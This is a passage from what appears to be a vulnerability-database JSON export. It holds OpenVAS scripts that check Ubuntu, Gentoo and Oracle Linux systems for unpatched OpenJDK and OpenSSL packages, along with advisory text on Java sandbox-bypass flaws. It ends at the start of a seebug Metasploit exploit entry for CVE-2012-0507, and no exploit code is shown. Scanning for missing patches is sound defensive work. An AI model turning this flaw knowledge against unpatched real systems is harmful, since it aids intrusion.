"CVE-2011-5035", "CVE-2012-0506", "CVE-2012-0497", "CVE-2012-0505", "CVE-2012-0501", "CVE-2012-0502"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840919", "href": "http://plugins.openvas.org/nasl.php?oid=840919", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1373_2.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for openjdk-6b18 USN-1373-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN 1373-1 fixed vulnerabilities in OpenJDK 6 in Ubuntu 10.04 LTS,\n Ubuntu 10.10 and Ubuntu 11.04 for all architectures except for ARM\n (armel). This provides the corresponding OpenJDK 6 update for use\n with the ARM (armel) architecture in Ubuntu 10.04 LTS, Ubuntu 10.10\n and Ubuntu 11.04.\n\n Original advisory details:\n\n It was discovered that the Java HttpServer class did not limit the\n number of headers read from a HTTP request. A remote attacker could\n cause a denial of service by sending special requests that trigger\n hash collisions predictably. (CVE-2011-5035)\n\n ATTENTION: this update changes previous Java HttpServer class behavior\n by limiting the number of request headers to 200. This may be increased\n by adjusting the sun.net.httpserver.maxReqHeaders property.\n\n It was discovered that the Java Sound component did not properly\n check buffer boundaries. A remote attacker could use this to cause\n a denial of service or view confidential data. (CVE-2011-3563)\n\n It was discovered that the Java2D implementation does not properly\n check graphics rendering objects before passing them to the native\n renderer. A remote attacker could use this to cause a denial of\n service or to bypass Java sandbox restrictions. (CVE-2012-0497)\n\n It was discovered that an off-by-one error exists in the Java ZIP\n file processing code. An attacker could us this to cause a denial of\n service through a maliciously crafted ZIP file. (CVE-2012-0501)\n\n It was discovered that the Java AWT KeyboardFocusManager did not\n properly enforce keyboard focus security policy. A remote attacker\n could use this with an untrusted application or applet to grab keyboard\n focus and possibly expose confidential data. (CVE-2012-0502)\n\n It was discovered that the Java TimeZone class did not properly enforce\n security policy around setting the default time zone. A remote attacker\n could use this with an untrusted application or applet to set a new\n default time zone and bypass Java sandbox restrictions. (CVE-2012-0503)\n\n It was discovered the Java ObjectStreamClass did not throw\n an accurately identifiable exception when a deserialization\n failure occurred. A remote attacker could use this with\n an untrusted application or applet to bypass Java sandbox\n restrictions. (CVE-2012-0505)\n\n It was discovered that the Java CORBA implementation did not properly\n protect repository identifiers on certain CORBA objects. A remote\n attacker could use this to corrupt object data. (CVE-2012-0506)\n\n It was discovered that the Java AtomicReferenceArray c ...\n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1373-2\";\ntag_affected = \"openjdk-6b18 on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1373-2/\");\n script_id(840919);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-07 11:19:39 +0530 (Wed, 07 Mar 2012)\");\n script_cve_id(\"CVE-2011-5035\", \"CVE-2011-3563\", \"CVE-2012-0497\", \"CVE-2012-0501\",\n \"CVE-2012-0502\", \"CVE-2012-0503\", \"CVE-2012-0505\", \"CVE-2012-0506\",\n \"CVE-2012-0507\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1373-2\");\n script_name(\"Ubuntu Update for openjdk-6b18 USN-1373-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b18-1.8.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b18-1.8.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b18-1.8.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b18-1.8.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b18-1.8.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b18-1.8.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b18-1.8.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b18-1.8.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b18-1.8.13-0ubuntu1~11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b18-1.8.13-0ubuntu1~11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b18-1.8.13-0ubuntu1~11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b18-1.8.13-0ubuntu1~11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b18-1.8.13-0ubuntu1~11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:30", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1373-1", "cvss3": {}, "published": "2012-03-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for openjdk-6 USN-1373-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2012-0507", "CVE-2012-0503", "CVE-2011-5035", "CVE-2012-0506", "CVE-2012-0497", "CVE-2012-0505", "CVE-2012-0501", "CVE-2012-0502"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840909", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840909", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1373_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for openjdk-6 USN-1373-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1373-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840909\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-09 18:57:39 +0530 (Fri, 09 Mar 2012)\");\n script_cve_id(\"CVE-2011-5035\", \"CVE-2011-3563\", \"CVE-2012-0497\", \"CVE-2012-0501\",\n \"CVE-2012-0502\", \"CVE-2012-0503\", \"CVE-2012-0505\", \"CVE-2012-0506\",\n \"CVE-2012-0507\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1373-1\");\n script_name(\"Ubuntu Update for openjdk-6 USN-1373-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.10|10\\.04 LTS|11\\.04)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1373-1\");\n script_tag(name:\"affected\", value:\"openjdk-6 on Ubuntu 11.04,\n Ubuntu 10.10,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that the Java HttpServer class did not limit the\n number of headers read from a HTTP request. A remote attacker could\n cause a denial of service by sending special requests that trigger\n hash collisions predictably. (CVE-2011-5035)\n\n ATTENTION: this update changes previous Java HttpServer class behavior\n by limiting the number of request headers to 200. This may be increased\n by adjusting the sun.net.httpserver.maxReqHeaders property.\n\n It was discovered that the Java Sound component did not properly\n check buffer boundaries. A remote attacker could use this to cause\n a denial of service or view confidential data. (CVE-2011-3563)\n\n It was discovered that the Java2D implementation does not properly\n check graphics rendering objects before passing them to the native\n renderer. A remote attacker could use this to cause a denial of\n service or to bypass Java sandbox restrictions. (CVE-2012-0497)\n\n It was discovered that an off-by-one error exists in the Java ZIP\n file processing code. An attacker could us this to cause a denial of\n service through a maliciously crafted ZIP file. (CVE-2012-0501)\n\n It was discovered that the Java AWT KeyboardFocusManager did not\n properly enforce keyboard focus security policy. A remote attacker\n could use this with an untrusted application or applet to grab keyboard\n focus and possibly expose confidential data. (CVE-2012-0502)\n\n It was discovered that the Java TimeZone class did not properly enforce\n security policy around setting the default time zone. A remote attacker\n could use this with an untrusted application or applet to set a new\n default time zone and bypass Java sandbox restrictions. (CVE-2012-0503)\n\n It was discovered the Java ObjectStreamClass did not throw\n an accurately identifiable exception when a deserialization\n failure occurred. A remote attacker could use this with\n an untrusted application or applet to bypass Java sandbox\n restrictions. (CVE-2012-0505)\n\n It was discovered that the Java CORBA implementation did not properly\n protect repository identifiers on certain CORBA objects. A remote\n attacker could use this to corrupt object data. (CVE-2012-0506)\n\n It was discovered that the Java AtomicReferenceArray class\n implementation did not properly check if an array was of\n the expected Object[] type. A remote attacker could use this\n with a malicious application or applet to bypass Java sandbox\n restrictions. (CVE-2012-0507)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b20-1.9.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b20-1.9.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b20-1.9.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b20-1.9.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b20-1.9.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b20-1.9.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b20-1.9.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b20-1.9.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b20-1.9.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b20-1.9.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:01", "description": "Gentoo Linux Local Security Checks GLSA 201312-03", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201312-03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0166", "CVE-2012-2333", "CVE-2006-7250", "CVE-2013-0169", "CVE-2012-1165", "CVE-2012-2686", "CVE-2012-2110", "CVE-2012-0884", "CVE-2011-1945"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121084", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121084", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201312-03.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121084\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:24 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201312-03\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201312-03\");\n script_cve_id(\"CVE-2006-7250\", \"CVE-2011-1945\", \"CVE-2012-0884\", \"CVE-2012-1165\", \"CVE-2012-2110\", \"CVE-2012-2333\", \"CVE-2012-2686\", \"CVE-2013-0166\", \"CVE-2013-0169\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201312-03\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 1.0.0j\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8y\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p1\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p2\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p3\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p4\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p5\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p6\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p7\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p8\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p9\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p10\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p11\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p12\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p13\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p14\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8z_p15\"), vulnerable: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", vulnerable: make_list(\"le 1.0.0j\"), unaffected: make_list())) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/openssl\", vulnerable: make_list(\"le 0.9.8y\"), unaffected: make_list())) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:02", "description": "Oracle Linux Local Security Checks ELSA-2012-0322", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0322", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2012-0507", "CVE-2012-0503", "CVE-2011-5035", "CVE-2011-3571", "CVE-2012-0506", "CVE-2012-0497", "CVE-2012-0505", "CVE-2012-0501", "CVE-2012-0502"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123981", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123981", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0322.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123981\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:11:08 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0322\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0322 - java-1.6.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0322\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0322.html\");\n script_cve_id(\"CVE-2011-3563\", \"CVE-2012-0497\", \"CVE-2012-0501\", \"CVE-2012-0502\", \"CVE-2012-0503\", \"CVE-2012-0505\", \"CVE-2012-0506\", \"CVE-2011-3571\", \"CVE-2011-5035\", \"CVE-2012-0507\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.25.1.10.6.0.1.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.25.1.10.6.0.1.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.25.1.10.6.0.1.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.25.1.10.6.0.1.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.25.1.10.6.0.1.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T13:47:06", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "Java AtomicReferenceArray Type Violation Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0507"], "modified": "2014-07-01T00:00:00", "id": "SSV:72735", "href": "https://www.seebug.org/vuldb/ssvid-72735", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 